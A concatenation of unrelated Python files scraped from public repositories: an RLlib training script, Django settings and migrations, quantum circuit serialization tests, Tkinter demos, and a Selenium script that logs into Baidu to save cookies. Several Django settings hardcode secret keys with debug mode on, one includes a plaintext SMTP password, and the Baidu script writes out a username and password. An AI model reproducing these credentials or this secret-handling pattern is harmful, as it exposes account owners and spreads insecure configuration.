] | permissive | cove9988/godot_rl_agents | 757f210d6dcaf0adb2f014386fb0cfa15cbe546a | 98821bdcd68304ec31350701bba064bbdcdb3ba6 | refs/heads/main | 2023-08-21T03:55:45.908510 | 2021-10-17T18:40:04 | 2021-10-17T18:40:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,507 | py | import numpy as np
import ray
from ray import tune
from ray.rllib.utils.annotations import override
from ray.rllib.utils.typing import MultiAgentDict, PolicyID, AgentID
from ray.rllib.agents import impala
from ray.tune.logger import pretty_print
import ray.rllib.agents.ppo as ppo
from godot_rl_agents.core.utils import register_env
if __name__ == "__main__":
ray.init()
register_env()
config = {
"env": "godot",
"env_config": {
"filename": "envs/example_envs/builds/JumperHard/jumper_hard.x86_64",
# "filename": None,
"seed": None,
},
# For running in editor, force to use just one Worker (we only have
# one Unity running)!
"num_workers": 4,
"num_envs_per_worker": 16,
# "remote_worker_envs": True,
# Other settings.
"lr": 0.0003,
"lambda": 0.95,
"gamma": 0.99,
"sgd_minibatch_size": 128,
"train_batch_size": 1024,
"batch_mode": "truncate_episodes",
# Use GPUs iff `RLLIB_NUM_GPUS` env var set to > 0.
"num_gpus": 0,
"num_sgd_iter": 16,
"rollout_fragment_length": 32,
"clip_param": 0.2,
"entropy_coeff": 0.001,
"model": {
"fcnet_hiddens": [256, 256],
},
"framework": "torch",
"no_done_at_end": True,
"soft_horizon": True,
}
stop = {
"training_iteration": 200,
"timesteps_total": 1000000,
"episode_reward_mean": 400.0,
}
# trainer = ppo.PPOTrainer(config=config, env="godot")
# # Can optionally call trainer.restore(path) to load a checkpoint.
# for i in range(100):
# # Perform one iteration of training the policy with PPO
# result = trainer.train()
# print(pretty_print(result))
# if i % 10 == 0:
# checkpoint = trainer.save()
# print("checkpoint saved at", checkpoint)
# checkpoint = "/home/edward/ray_results/PPO/PPO_godot_658a8_00000_0_2021-08-30_20-23-39/checkpoint_000200/checkpoint-200"
# print(config)
# Run the experiment.
results = tune.run(
"PPO",
config=config,
stop=stop,
verbose=3,
checkpoint_freq=5,
checkpoint_at_end=True,
restore=None,
)
# trainer = ppo.PPOTrainer(config=config, env="godot")
# trainer.load_checkpoint(results.get_last_checkpoint())
# print(trainer.get_policy().get_weights())
ray.shutdown()
| [
"[email protected]"
] | |
6a80f1e4ce6a2892e8d9a978640499904cf163a6 | 5642a27fb8f0ee5e3e29036c84704e62db90a9a6 | /my_project/settings.py | f875f761671fb35fcea152defc1c7cad24e4f6e6 | [] | no_license | mayurfinity/django_basic | bff5b8e5a178d86c7553004ef9be7b8861e6bd93 | e4ca77163fc4cef0de14594bb76acb24ac95bd75 | refs/heads/main | 2023-01-19T07:32:19.775269 | 2020-11-13T14:36:08 | 2020-11-13T14:36:08 | 312,298,562 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,359 | py | """
Django settings for my_project project.
Generated by 'django-admin startproject' using Django 3.1.3.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path,os
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '=i2^)2y!0%kz8f20fti5dpovuk23!g8e$vu_h!!i0!$l!*8i7l'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'basic_app',
'django_app',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'my_project.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, "templates")],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'my_project.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static"),
]
PROJECT_ROOT = os.path.dirname(os.path.abspath(__file__))
STATIC_ROOT = os.path.join(PROJECT_ROOT, 'static')
AUTH_USER_MODEL = "basic_app.CustUser" | [
"[email protected]"
] | |
165cc550b88080b62182b10cfb502c6484f69c33 | 5d83089c29052ba850a08968676826a02b94b64d | /src/python/zquantum/core/wip/circuits/_serde_test.py | 3969d141ba9c8aeaf331753ea2d1d024b36bdb0b | [
"Apache-2.0"
] | permissive | koderat/z-quantum-core | 35bd27ec3f0597edc65a97dc5b9ed9bd29c2bc81 | 45aefee4eea05bce8d26c201bd471b76d05db139 | refs/heads/master | 2023-04-07T02:13:58.204681 | 2021-03-19T16:26:28 | 2021-03-19T16:26:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,179 | py | import pytest
import sympy
import numpy as np
from . import _gates
from . import _builtin_gates
from . import _circuit
from ._serde import (
serialize_expr,
deserialize_expr,
circuit_from_dict,
custom_gate_def_from_dict,
to_dict,
)
ALPHA = sympy.Symbol("alpha")
GAMMA = sympy.Symbol("gamma")
THETA = sympy.Symbol("theta")
CUSTOM_U_GATE = _gates.CustomGateDefinition(
"U",
sympy.Matrix(
[
[THETA, GAMMA],
[-GAMMA, THETA],
]
),
(THETA, GAMMA),
)
@pytest.mark.parametrize(
"circuit",
[
_circuit.Circuit(),
_circuit.Circuit([_builtin_gates.X(0)]),
_circuit.Circuit([_builtin_gates.X(2), _builtin_gates.Y(1)]),
_circuit.Circuit(
[
_builtin_gates.H(0),
_builtin_gates.CNOT(0, 1),
_builtin_gates.RX(0)(5),
_builtin_gates.RX(np.pi)(2),
]
),
_circuit.Circuit(
[
_builtin_gates.RX(GAMMA * 2)(3),
]
),
_circuit.Circuit(
operations=[
_builtin_gates.T(0),
CUSTOM_U_GATE(1, -1)(3),
CUSTOM_U_GATE(ALPHA, -1)(2),
],
),
_circuit.Circuit(
operations=[
CUSTOM_U_GATE(2 + 3j, -1)(2),
],
),
_circuit.Circuit(
[
_builtin_gates.H.controlled(1)(0, 1),
]
),
_circuit.Circuit(
[
_builtin_gates.Z.controlled(2)(4, 3, 0),
]
),
_circuit.Circuit(
[
_builtin_gates.RY(ALPHA * GAMMA).controlled(1)(3, 2),
]
),
_circuit.Circuit(
[
_builtin_gates.X.dagger(2),
_builtin_gates.I.dagger(4),
_builtin_gates.Y.dagger(1),
_builtin_gates.Z.dagger(2),
_builtin_gates.T.dagger(7),
]
),
_circuit.Circuit(
[
_builtin_gates.RX(-np.pi).dagger(2),
_builtin_gates.RY(-np.pi / 2).dagger(1),
_builtin_gates.RZ(0).dagger(0),
_builtin_gates.PHASE(np.pi / 5).dagger(2),
]
),
_circuit.Circuit(
[
_builtin_gates.RX(GAMMA * ALPHA).dagger(1),
]
),
],
)
class TestCircuitSerialization:
def test_roundrip_results_in_same_circuit(self, circuit):
serialized = to_dict(circuit)
assert circuit_from_dict(serialized) == circuit
def test_deserialized_gates_produce_matrices(self, circuit):
deserialized_circuit = circuit_from_dict(to_dict(circuit))
for operation in deserialized_circuit.operations:
# matrices are computed lazily, so we have to call the getter to know if
# we deserialized parameters properly
operation.gate.matrix
class TestCustomGateDefinitionSerialization:
@pytest.mark.parametrize(
"gate_def",
[
_gates.CustomGateDefinition(
"V", sympy.Matrix([[THETA, GAMMA], [-GAMMA, THETA]]), (THETA, GAMMA)
)
],
)
def test_roundtrip_gives_back_same_def(self, gate_def):
dict_ = to_dict(gate_def)
assert custom_gate_def_from_dict(dict_) == gate_def
class TestExpressionSerialization:
@pytest.mark.parametrize(
"expr,symbol_names",
[
(0, []),
(1, []),
(-1, []),
(THETA, ["theta"]),
(GAMMA, ["gamma"]),
(THETA * GAMMA + 1, ["gamma", "theta"]),
(2 + 3j, []),
((-1 + 2j) * THETA * GAMMA, ["gamma", "theta"]),
],
)
def test_roundtrip_results_in_equivalent_expression(self, expr, symbol_names):
serialized = serialize_expr(expr)
deserialized = deserialize_expr(serialized, symbol_names)
# `deserialized == expr` wouldn't work here for complex literals because of
# how Sympy compares expressions
assert deserialized - expr == 0
| [
"[email protected]"
] | |
13ad3ac4eec115ca433e8fbc3ddaafc3ae3d0332 | 23bbaf0207772f1fc9b4519a0982fe976425f7b3 | /env/bin/wheel | 45226e48b660fcd363f1f31db9deaf8ae0758d67 | [] | no_license | nakedlunch/kanban | aa4c45ca45d7dc939e6694076f9da124e82de8f7 | a3c82871cad044f7dfa9e5f7a324bf7cdd56f256 | refs/heads/master | 2020-03-27T07:17:43.377266 | 2018-08-26T23:47:12 | 2018-08-26T23:47:12 | 146,178,768 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 239 | #!/Users/elliot/dev/Kanban/env/bin/python2.7
# -*- coding: utf-8 -*-
import re
import sys
from wheel.tool import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"[email protected]"
] | ||
3b30bf6edad76b99281f9a1bad5845b2575bed29 | 1dba27f25a5faa46e81638404d9ee4cb793ddf19 | /newspaper_project/newspaper_project/settings.py | b7f3997af12db9836317ab982a5d4783e7eb27b5 | [] | no_license | aybamidele/newspaper-django-app | efbde3f0964a9ecaca3d35897f4a45a95e94dd57 | 99fb63a0c1632c15e38058e8faf55e3fb0b3a00a | refs/heads/master | 2020-03-31T20:38:11.985351 | 2018-10-13T12:47:26 | 2018-10-13T12:47:26 | 152,548,518 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,549 | py | """
Django settings for newspaper_project project.
Generated by 'django-admin startproject' using Django 2.1.1.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'qdv-hgdocu6c7i$1wu$j28c54$luj2=1nh(pum^szypho9e7^3'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'users',
'pages',
'crispy_forms',
'articles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'newspaper_project.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'newspaper_project.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
AUTH_USER_MODEL = 'users.CustomUser'
LOGIN_REDIRECT_URL = 'home'
LOGOUT_REDIRECT_URL = 'home'
CRISPY_TEMPLATE_PACK = 'bootstrap4'
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_HOST = 'smtp.sendgrid.net'
EMAIL_HOST_USER = 'andrebam'
EMAIL_HOST_PASSWORD = 'Tolulope1'
EMAIL_PORT = 587
EMAIL_USE_TLS = True
| [
"[email protected]"
] | |
5d2eb29592b9ad81a73a8f5da5386f4a23803f30 | ddebed6f9aa34f8506c2ac202ceb6b5a04c6b2a0 | /yiqi/apps/userOperation/migrations/0002_auto_20181031_1703.py | bf4382195bd28cdc78213389e3c5137a68061be0 | [] | no_license | AmirHuang/yiqi | bcd773db02740f83c8f478494500013a36d7d77e | 561325a35ca21e9685c9c1a946d5604d7d3afc74 | refs/heads/master | 2020-04-25T03:56:28.988287 | 2019-02-25T11:34:00 | 2019-02-25T11:34:00 | 172,493,868 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,003 | py | # Generated by Django 2.0.2 on 2018-10-31 09:03
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('activity', '0002_auto_20181031_1703'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('userOperation', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='sysmessages',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='接收用户'),
),
migrations.AddField(
model_name='sharingusermodel',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='分享用户'),
),
migrations.AddField(
model_name='reporttionusermodel',
name='activity',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='activity.ActivityModel', verbose_name='举报活动'),
),
migrations.AddField(
model_name='reporttionusermodel',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='举报用户'),
),
migrations.AddField(
model_name='feedbackmodels',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='反馈用户'),
),
migrations.AddField(
model_name='commentsmodels',
name='activity',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='activity.ActivityModel', verbose_name='评论活动'),
),
migrations.AddField(
model_name='commentsmodels',
name='parent_comment',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='p_comment', to='userOperation.CommentsModels', verbose_name='父评论'),
),
migrations.AddField(
model_name='commentsmodels',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='评论用户'),
),
migrations.AddField(
model_name='collectionusermodel',
name='activity',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='activity.ActivityModel', verbose_name='收藏活动'),
),
migrations.AddField(
model_name='collectionusermodel',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='收藏用户'),
),
migrations.AddField(
model_name='browseusermodel',
name='activity',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='activity_db', to='activity.ActivityModel', verbose_name='浏览活动'),
),
migrations.AddField(
model_name='browseusermodel',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='浏览用户'),
),
migrations.AddField(
model_name='activityuserinfo',
name='activity',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='activity.ActivityModel', verbose_name='活动'),
),
migrations.AddField(
model_name='activityuserinfo',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='报名用户'),
),
]
| [
"[email protected]"
] | |
4ae12faf6838569609ce4b6c06aa800853d3ac79 | d8d88c5bbe09c0f4fae8987fee0608e2cc96094c | /gui/hello_world.py | 674e092543503a8a301ff3476ff654c29e769377 | [] | no_license | liushuiluohua/learn-python | 03e7b6429162fcac20e1ac66508cfbfcdd766c72 | 7d864c6713c9aebfc8b2574d0f8fbdedf962b51f | refs/heads/master | 2020-12-26T03:43:23.761160 | 2017-11-09T03:15:44 | 2017-11-09T03:15:44 | 25,071,038 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 575 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'a hello world GUI example.'
from Tkinter import *
class Application(Frame):
def __init__(self, master=None):
Frame.__init__(self, master)
self.pack()
self.createWidgets()
def createWidgets(self):
self.helloLabel = Label(self, text='Hello, world!')
self.helloLabel.pack()
self.quitButton = Button(self, text='Quit', command=self.quit)
self.quitButton.pack()
app = Application()
# 窗口标题:
app.master.title('Hello World')
# 主消息循环:
app.mainloop()
| [
"[email protected]"
] | |
98e4fe446852205a84cd13c25111e4153ef15194 | 460a24c7d34bc3b9632afb8b75922fd4932a9170 | /singleton/logger.py | fb60cd7d21d089655a80acd2903c02d00bfd32c9 | [] | no_license | jokerTing/python-design-patterns | 1476833e745a2a87487bc48b53187e655f70c4ee | 3e62d60a99578b88ea78c42a2d89e0c5ecbc32b9 | refs/heads/master | 2022-01-21T01:01:59.266522 | 2022-01-18T02:11:43 | 2022-01-18T02:11:43 | 182,976,986 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,833 | py | from singleton_object import SingletonObject
#record the log
#__author__='ShadowDing'
class Logger(object):
"""
A file-based message logger with the following properties
Attributes:
file_name: a string representing the full path of the log file to which
this logger will write its messgae
"""
class __Logger():
def __init__(self, file_name):
""" Return a Logger object whose file_name is *file_name* """
self.file_name = file_name
def __str__(self):
return "{0!r} {1}".format(self, self.file_name)
# record msg in the Target file
def _write_log(self, level, msg):
with open(self.file_name, "a") as log_file:
log_file.write("[{0}] {1} \n".format(level, msg))
# record the CRITICAL msg
def critical(self, msg):
self._write_log("CRITICAL", msg)
# record the ERROR msg
def error(self, msg):
self._write_log("ERROR", msg)
# record the WARN msg
def warn(self, msg):
self._write_log("WARN", msg)
# record the INFO msg
def info(self, msg):
self._write_log("INFO", msg)
# record the DEBUG msg
def debug(self, msg):
self._write_log("DEBUG", msg)
instance = None
def __new__(cls, *args, **kwargs):
print("new")
if not Logger.instance:
print("first create")
Logger.instance = Logger.__Logger(*args, **kwargs)
return Logger.instance
def __getattr__(self, name):
print("__getattr__() is called ")
#return name + " from getattr"
return getattr(self.instance, name)
def __setattr__(self, name, val):
print ("change")
return setattr(self.instance, name , val)
| [
"[email protected]"
] | |
86fe21da6e53357da6f41a5b7d95dd034c2d3284 | a9bdddbe65c0f4a9ade6fecf6d88440b43d681d4 | /backend/src/geektrade/settings.py | be2279982e4c0c1f3fc3eb966ccc776021af986b | [] | no_license | winiciuscota/GeekTrade | e2d7c1e6a72af5dff59216a721e41355fc47df83 | 39a6b7b8b1baab8e1c373d8efdf39698c9cda34f | refs/heads/master | 2020-04-22T07:17:12.338210 | 2019-02-12T01:47:48 | 2019-02-12T01:47:48 | 170,214,505 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,769 | py | import time
"""
Django settings for geektrade project.
Generated by 'django-admin startproject' using Django 2.0.4.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
import environ
# Load operating system env variables and prepare to use them
env = environ.Env()
# local.env file, should load only in development environment
env_file = os.path.join(os.path.dirname(__file__), 'local.env')
if os.path.exists(env_file):
environ.Env.read_env(str(env_file))
QUOTATION_API_KEY = env('QUOTATION_API_KEY')
QUOTATION_API_URL = env('QUOTATION_API_URL')
QUOTATION_REQUEST_URL = QUOTATION_API_URL + QUOTATION_API_KEY
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'aze!9t4+&(&28$x45+tm3)g%gdk2ko@6vrz@ih8p6x*6pn2#)!'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['localhost']
# CORS settings
CORS_ORIGIN_ALLOW_ALL = True
CORS_ALLOW_CREDENTIALS = True
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'quotations.apps.QuotationsConfig',
'corsheaders',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'corsheaders.middleware.CorsMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'geektrade.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'geektrade.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = '/static/'
| [
"[email protected]"
] | |
f134de3fa0bc09d9841e4fd5d7a76fd6c8d79dbe | ecc3806d0a417bfcc6d37f9bb5107bf9fa72275f | /lyweb/lib/SQLAlchemy-0.8.2/test/orm/inheritance/test_selects.py | dd9c8c8b81ad7af74bf54cb0a9af09dba5a796e2 | [
"MIT"
] | permissive | luoyun/LuoYunCloud | ef6fa76e8b3a0880392b71d7569b304009041bf1 | ee8fedd988cc39375dda69588c2f7bba1223fbe1 | refs/heads/master | 2021-12-03T05:26:47.656130 | 2021-11-30T13:16:34 | 2021-11-30T13:16:34 | 3,886,020 | 6 | 10 | null | 2013-06-25T14:04:23 | 2012-03-31T14:33:55 | JavaScript | UTF-8 | Python | false | false | 1,820 | py | from sqlalchemy import *
from sqlalchemy.orm import *
from sqlalchemy import testing
from sqlalchemy.testing import fixtures
class InheritingSelectablesTest(fixtures.MappedTest):
@classmethod
def define_tables(cls, metadata):
global foo, bar, baz
foo = Table('foo', metadata,
Column('a', String(30), primary_key=1),
Column('b', String(30), nullable=0))
bar = foo.select(foo.c.b == 'bar').alias('bar')
baz = foo.select(foo.c.b == 'baz').alias('baz')
def test_load(self):
# TODO: add persistence test also
testing.db.execute(foo.insert(), a='not bar', b='baz')
testing.db.execute(foo.insert(), a='also not bar', b='baz')
testing.db.execute(foo.insert(), a='i am bar', b='bar')
testing.db.execute(foo.insert(), a='also bar', b='bar')
class Foo(fixtures.ComparableEntity): pass
class Bar(Foo): pass
class Baz(Foo): pass
mapper(Foo, foo, polymorphic_on=foo.c.b)
mapper(Baz, baz,
with_polymorphic=('*', foo.join(baz, foo.c.b=='baz').alias('baz')),
inherits=Foo,
inherit_condition=(foo.c.a==baz.c.a),
inherit_foreign_keys=[baz.c.a],
polymorphic_identity='baz')
mapper(Bar, bar,
with_polymorphic=('*', foo.join(bar, foo.c.b=='bar').alias('bar')),
inherits=Foo,
inherit_condition=(foo.c.a==bar.c.a),
inherit_foreign_keys=[bar.c.a],
polymorphic_identity='bar')
s = sessionmaker(bind=testing.db)()
assert [Baz(), Baz(), Bar(), Bar()] == s.query(Foo).order_by(Foo.b.desc()).all()
assert [Bar(), Bar()] == s.query(Bar).all()
| [
"[email protected]"
] | |
09ee188e0e0198bf781e7d62c16c41f203004684 | 0b1b3c2fbbbfdfe8a2c807eac16c0987bb72d088 | /show_lable.py | 0a21a5f66116c5e346df5b4c68c8bba65db2736b | [] | no_license | luceefer/jarvis | 0c66e875920c12b6bdb806a25e41d6430126b27b | f9bce1e1fa69eeb5aab093ff4f1af4b3640820c7 | refs/heads/master | 2020-09-02T09:10:54.984994 | 2020-03-27T07:57:24 | 2020-03-27T07:57:24 | 219,187,100 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 566 | py | from tkinter import *
from tkinter import messagebox
def show():
text=inp.get().strip()
var.set(inp.get())
if len(text)==0:
messagebox.showerror("invalid data","you haven't entered a string")
else:
var.set(text)
inp.delete(0,END)
root=Tk()
root.title("change Lable")
root.geometry("250x200")
var=StringVar()
var.set("My label")
lab=Label(root,text="My Lable",textvariable=var)
lab.pack()
inp=Entry(root,bd=5)
inp.pack()
but=Button(root,text="Show",command=show)
but.pack()
inp.focus()
root.mainloop()
| [
"[email protected]"
] | |
8509bcc7b74ba994bd01e48425a401c28d9f421d | a38da65c23ae9b68f5c2815c2bd9d98dd6ba2e61 | /spider_note/demo-10-登陆百度获取cookies,requests.py | a2774bb00411eadd680996d3fcd382a8465e86e7 | [] | no_license | moxue1314/spider_note | 64921113e44c6a4a5ddad5b564f35434f4888c54 | a12a7bfa1d5cea497df67fbdd58ff8dc705ab5b8 | refs/heads/master | 2020-03-20T01:50:16.847556 | 2018-06-12T15:36:51 | 2018-06-12T15:36:51 | 137,090,331 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,489 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
import random
import time
from lxml import etree
import requests
from requests.cookies import RequestsCookieJar
__author__ = 'Jiexun Li'
from selenium import webdriver
# 作业:
# 1. 用 selenium 登录百度,获取cookie,保存cookie
# 2. 用 requests 读取cookie,登录百度页面
# 3. 访问 百度指数,访问关键字
# ------------------------------登录百度 保存cookie------------------------------------------------------
# 火狐
# driver = webdriver.Firefox()
#
# # 设置窗口大小
# driver.set_window_size(1366, 768)
# # 页面的加载超时时间
# driver.set_page_load_timeout(10)
# # script脚本的超时时间
# driver.set_script_timeout(10)
#
# driver.get('https://www.baidu.com/')
#
# time.sleep(2)
#
# ele_login_ui = driver.find_element_by_xpath('//div[@id="u1"]/a[@name="tj_login"]')
# # driver.execute_script("window.scrollTo(0, 0);") # 将滚动条移动到指定的位置
# ele_login_ui.click()
#
# # driver.get('https://passport.baidu.com/v2/?login&tpl=mn&u=http%3A%2F%2Fwww.baidu.com%2F&sms=5')
# time.sleep(2)
# ele_login_button = driver.find_element_by_id('TANGRAM__PSP_10__footerULoginBtn')
# ele_login_button.click()
# time.sleep(2)
#
# ele_username = driver.find_element_by_id('TANGRAM__PSP_10__userName')
# ele_username.clear()
# # 用户名
# ele_username.send_keys('mumuloveshine')
# ele_pwd = driver.find_element_by_id('TANGRAM__PSP_10__password')
# ele_pwd.clear()
# # 密码
# ele_pwd.send_keys('mumu2018')
#
#
# # ****登陆前输入验证码***** 在此处需设置断点
#
#
# ele_login = driver.find_element_by_id('TANGRAM__PSP_10__submit')
